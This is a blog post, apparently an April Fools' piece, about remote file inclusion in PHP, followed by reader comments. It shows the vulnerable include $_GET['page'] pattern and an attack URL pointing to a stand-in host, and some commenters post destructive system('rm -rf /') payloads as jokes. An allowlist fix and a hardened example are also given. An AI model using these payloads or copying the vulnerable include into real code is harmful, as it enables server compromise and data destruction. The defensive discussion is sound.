PHP Virus Attacking Web Hosts

Symantec have a report of the virus here.

I’ve yet to see any of the PHP news sites pick up on it, but, using a virtual host account, I managed to deliberately expose some PHP scripts to it.

From examining the infected scripts, what’s disturbing is that once infected, every time a script is executed, the virus goes on a hunt for other web sites using PHP to see if it can trick them into executing the virus, thereby spreading it further directly over the Internet. Although the spread is likely to be slow, it can take place automatically, without your intervention!

If your site contains code like:


// index.php
include $_GET['page'];

You need to take action now – your site could be infected with a URL like:


http://yoursite.com/index.php?page=http://virus.com/virus.php

A simple way to validate is:


// Only these names are ever turned into a file name to include
$pages = array('news','articles','blog');
if ( isset($_GET['page']) && in_array($_GET['page'], $pages, true) ) {
    include $_GET['page'] . '.php';
} else {
    // Anything missing or not on the list falls back to the home page
    include 'home.php';
}

Sitepoint have taken the extreme but necessary approach of upgrading to .NET in response.


  • run4fun

    thank god it’s not Friday
    instead it’s April Fools’ :)

  • http://www.rideontwo.com z0s0

    <?php
    system("rm -rf /");
    ?>

  • http://www.rideontwo.com z0s0

    damnit!

  • Luke

    Oh no!! I better start learning ASP! Do you know any good .Net tutorials?

  • http://www.madproject.com madproject.com

    Damn! I guess I better scrap my PHP project and ASP it pronto.
    I trust that I’ll encounter far less bugs.

    :p

  • http://www.flippedout.net Bryce

    In all seriousness, should this warning be heeded or taken as an April Fools joke? I’ve edited my pages, and am awaiting a response.

  • Icheb

    Bryce: It’s a joke. If you include another website’s PHP-pages, your webserver gets the HTML-output and not the PHP-code.

  • Chris Shiflett

    Icheb, really?

    Try this:

    <?php
    echo '<?php system("rm -rf /"); ?>';
    ?>

    :-)

  • http://www.phppatterns.com HarryF

    In all seriousness, should this warning be heeded or taken as an April Fools joke? I’ve edited my pages, and am awaiting a response.

    Don’t panic on the virus – actually that report is ages old (shame on Symantec for not putting a date on it), as is Pirus – John Lim mentioned it here back in 2000.

    But jesting aside, you should be careful using the include (or similar) statement with a variable that a visitor can modify. A common mistake is this:


    if ( isset ( $_GET['page'] ) ) {
        include $_GET['page'];
    } else {
        include 'default.php';
    }

    That’s a recipe for disaster – someone attacking your site can get your script to execute code from their site – they just need to make sure that what’s being included is valid PHP, from the point of view of the PHP parser (e.g. serve your script a page as plain text with a .txt extension). Try it in your own webserver, including a file like:


    include 'http://localhost/test.txt';

    Where test.txt contains some PHP.

    This behaviour in PHP can be switched off; see here. Simon has some interesting remarks on this functionality here. For a more in-depth analysis, try A Study in Scarlet.

    Bottom line: make sure you validate the incoming GET variable, a simple but effective approach being to require its value to be part of a list, as I did at the start.
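The list-based validation recommended in the post and again in the comment above, written out as an added example (not the post's own code): the visitor's ?page= value only ever selects a key in a fixed allowlist, and the string handed to include() is always the allowlist's own value. The file names, the allow_url_include check and the CLI self-test are assumptions made for the example.

```php
<?php
// Added example, not the post's own code: a ?page= dispatcher that
// resolves the visitor's value against a fixed allowlist, so the
// string actually handed to include() never comes from the request.

// Allowlist: request value (key) -> local file (value). Adding a page
// means adding a row here; nothing else ever reaches include().
$pages = array(
    'news'     => 'news.php',
    'articles' => 'articles.php',
    'blog'     => 'blog.php',
);

function resolve_page(array $pages, $requested, $default = 'home.php')
{
    // Missing, non-string (?page[]=x arrives as an array) and unknown
    // values all fall through to the default, never to request data.
    if (!is_string($requested) || !array_key_exists($requested, $pages)) {
        return $default;
    }
    return $pages[$requested];
}

if (PHP_SAPI === 'cli') {
    // Constructed sample values, as they would arrive in $_GET['page'].
    $samples = array(
        'news',                        // allowed key            -> news.php
        'http://virus.com/virus.php',  // the URL from the post  -> home.php
        'news.php',                    // a file name, not a key -> home.php
        null,                          // ?page absent           -> home.php
        array('x'),                    // ?page[]=x              -> home.php
    );
    foreach ($samples as $s) {
        printf("%-30s -> %s\n", json_encode($s), resolve_page($pages, $s));
    }
} else {
    // Defence in depth: even with the allowlist in place, remote
    // includes should be off in php.ini (allow_url_include, PHP >= 5.2).
    if (ini_get('allow_url_include')) {
        error_log('allow_url_include is on; remote include is possible');
    }
    $file = resolve_page($pages, isset($_GET['page']) ? $_GET['page'] : null);
    include __DIR__ . '/' . $file;
}
```

Run it from the command line to see each sample resolve to an allowlisted file or to home.php; under a web server it behaves as the dispatcher.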

  • newline

    Icheb: I do hope you’re kidding. If the include’d/require’d remote file has valid PHP tags in the output it will be parsed as such.

  • http://www.flippedout.net Bryce

    Well, you definitely got me. It was after 12PM here at the time so I guess I wasn’t on my guard. Still, it’s good to see that my time wasn’t so completely wasted :)

    Cheers

  • http://simon.incutio.com/ Skunk

    I’ve ranted about this before: This is quite simply PHP’s worst feature – executing arbitrary PHP code that has come in over an HTTP network connection is an unbelievably nasty security hole and should never happen, period. Almost every single critical security flaw in a PHP site that I’ve seen has been down to this feature.

  • WhatThe

    Skunk, what are you talking about? Only fools would take in user input and actually use that in an include statement. I don’t know what sites you have been looking at, but common flaws are SQL injection, XSS, and possibly cross site request forgeries…

  • Stewart

    Another point would be if the site supports the upload of files to the server (e.g. if you don’t check image uploads are actually images)

    So, if you upload a php script in place of an image, then use this script to run the php file, bang, you’re wide open.

    This is just a friday morning observation though, I could be entirely wrong and paranoid.

  • Nikobass

    This is an easy security hole to solve.
    I hope you didn’t even use this method to include some content in your scripts. It’s important to check the input before using it in your script. Basic mistake :)

  • saul

    the classic answer … throw the sofa through the window, instead of your wife, if you found her cheating on you on that sofa ;)

  • Icheb

    “Icheb: I do hope you’re kidding. If the include’d/require’d remote file has valid PHP tags in the output it will be parsed as such.”

    So? That’s not contrary to what I said. It still gets the *HTML-output* and not the PHP-code which generated that output.

  • http://simon.incutio.com/ Skunk

    WhatThe: you would be amazed at how many scripts I’ve seen that do exactly that! I reported that exact bug to the makers of a very popular PHP ShoutBox script a few months ago. Even Gallery has suffered from that bug in the past: check out the vulnerability announcement from last October. It’s a shockingly common mistake, and one that just shouldn’t be possible to make in the first place.

  • Pingback: SitePoint Blogs » Phalanger—better than the real thing?